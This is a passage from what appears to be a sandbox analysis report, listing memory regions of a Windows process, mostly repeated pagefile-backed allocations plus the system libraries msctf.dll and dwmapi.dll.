1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 1424 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1425 start_va = 0x45a0000 end_va = 0x45adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 1426 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1427 start_va = 0x76e80000 end_va = 0x76f9efff monitored = 0 entry_point = 0x76ec5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1428 start_va = 0x45a0000 end_va = 0x45a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 1429 start_va = 0x6e60000 end_va = 0x6f1bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006e60000" filename = "" Region: id = 1430 start_va = 0x45a0000 end_va = 0x45a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 1431 start_va = 0x73c80000 end_va = 0x73c9cfff monitored = 0 entry_point = 0x73c83b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1432 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1433 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1434 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1435 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1436 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1437 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1438 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1439 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1440 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1441 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1442 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1443 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1444 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1445 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1446 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1447 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1448 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1449 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1450 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1451 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1452 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1453 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1454 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1455 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1456 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1457 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1458 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1459 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1460 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1461 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1462 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1463 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1464 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1465 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1466 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1467 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1468 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1469 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1470 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1471 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1472 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1473 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1474 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1475 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1476 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1477 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1478 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1479 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1480 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1481 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1482 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1483 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1484 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1485 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1486 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1487 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1488 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1489 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1490 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1491 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1492 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1493 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1494 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1495 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1496 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1497 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1498 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1499 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1500 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1501 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1502 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1503 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1504 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1505 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1506 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1507 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1508 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1509 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1510 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1511 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1512 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1513 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1514 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1515 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1516 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1517 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1518 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1519 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1520 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1521 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1522 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1523 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1524 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1525 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1526 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1527 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1528 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1529 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1530 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1531 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1532 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1533 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1534 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1535 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1536 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1537 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1538 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1539 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1540 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1541 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1542 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1543 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1544 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1545 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1546 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1547 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1548 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1549 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1550 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1551 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1552 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1553 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1554 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1555 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1556 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1557 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1558 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1559 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1560 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1561 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1562 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1563 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1564 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1565 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1566 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1567 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1568 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1569 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1570 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1571 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1572 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1573 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1574 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1575 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1576 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1577 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1578 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1579 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1580 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1581 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1582 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1583 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1584 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1585 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1586 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1587 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1588 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1589 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1590 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1591 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1592 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1593 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1594 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1595 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1596 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1597 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1598 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1599 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1600 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1601 start_va = 0x45b0000 end_va = 